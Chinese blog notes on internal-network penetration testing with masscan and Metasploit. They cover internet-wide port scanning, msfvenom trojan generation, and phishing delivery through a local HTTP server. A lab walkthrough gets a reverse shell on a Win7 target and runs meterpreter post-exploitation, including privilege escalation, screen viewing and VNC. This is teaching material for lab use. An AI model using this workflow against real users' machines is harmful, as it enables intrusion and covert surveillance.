内网渗透笔记——msf

Masscan

号称五分钟扫遍互联网


性能优越,极限速度 1000w/s,参数 跟 nmap 差不多

-p 80,8000-8100 10.0.0.0/24
--max-rate=100000    //发包的极限速度


masscan 0.0.0.0/0 -p 0-65535     //扫描整个互联网的所有端口

不要轻易尝试.......

Metasploit(msf)

一旦出现漏洞,出现利用漏洞的方法,则会马上收录——傻瓜式攻击

早期想要利用漏洞——需知道漏洞的poc和exp

poc:漏洞验证脚本(只会告诉你存在这个漏洞)

​ log4j:calc

exp:漏洞利用脚本(详细操作方法)

msf分为两大块


msfconsole(控制台)

msfvenom(木马生成平台,一键生成木马)

metasploit v6.1.4-dev                           ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion  

exploite:漏洞利用,配合payload

payload:成功exp后,攻击过程中执行的指令或代码,反弹shell,也可以是直接在目标系统中执行的指令

- singles:所有代码都在一个文件中(大木马),会受到内存空间的限制
- stagers:传输payload所建立的连接,安全的把我们的payload传输到目标运行(stages)
- stages:stagers建立连接后,在传输的代码(payload)

auxiliary:辅助模块,用于信息收集,没有payload的exp
encoders:编码模块,对payload进行加密,躲避杀毒的查杀

post:取得shell,进一步运行的攻击指令(后渗透)

nops:空指令,起到混淆的作用

evasion:免杀,效果非常好,但具有时限性,百分百免杀

msfdb(msf数据库,用于信息收集的存储)

msfdb init          初始化数据库

service postgresql start      启动数据库
msfdb run   自动启用连接数据库

db_status        查询是否连接数据库

hosts、services      查询扫描到的数据

db_nmap == nmap(但是nmap不会存入数据库)

connect 192.168.111.131 4444  类似nc的小工具(这里是正向连接)

注意:初始化数据库,启动数据库之后,要重启控制台(exit——msfconsole)

use exploit/multi/handler      监听模块

-info 

-show options     都是查看命令

常见payload连接方式
payload:
    bind        正向
    reverse        反向
    http        80
    https        443

payload设置方式:

set payload 操作系统/[架构/]终端/连接方式

 meterpreter      升级版shell

 LHOST ——本地ip        LPORT——端口

完成

run开始监听(或者exploit)

msfvenom

木马生成平台

-p            设置payload
-a            架构 x64 x86
      --platform    设置平台 windows/linux
-e            编码
-i            迭代
-f            文件格式
        -f raw -o 1.apk
        R -o 1.apk
-o            输出文件
    >
-l | --list            信息详细

注意!生成的payload 要和console设置的payload大致相同

比如你监听的是windows的木马,你生成的是linux的木马,很明显不合理


lhost=本机ip
rhost=目标ip

以上面设置的payload为例子,生成一个木马

好了,现在至关重要的问题来了,该怎么把木马放到受害者的靶机上呢?

最常用的方法——钓鱼


在当前文件夹快速开启http服务——搭建本地的一个网页
python2.7 -m SimpleHTTPServer 8080
python3.9 -m http.server 8080

靶机进入临时网站

注意一点,win7靶机要事先关闭防火墙,不然kali无法ping通win7

这里有奇怪的一点,输http://192.168.111.130:8080/可以访问,但是输192.168.111.130:8080无法访问,有点玄学。

 kali立刻就会显示访问网页的ip地址

kali开始监听

靶机下载木马并运行

 

kali获得反弹shell,成功!

shell

shell ctrl_z          shell放入后台

sessions             查看后台的连接

 sessions -u ID       shell 会话提升→meterpreter

meterpreter

meterpreter  bg          返回上层

信息收集
getuid
getsid

sysinfo
getsystem    一键提权,失败率较高,满试试

 run vnc  直接直播

以网页的方式查看    >    直播
screenshare

常用的后渗透信息收集

 

  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值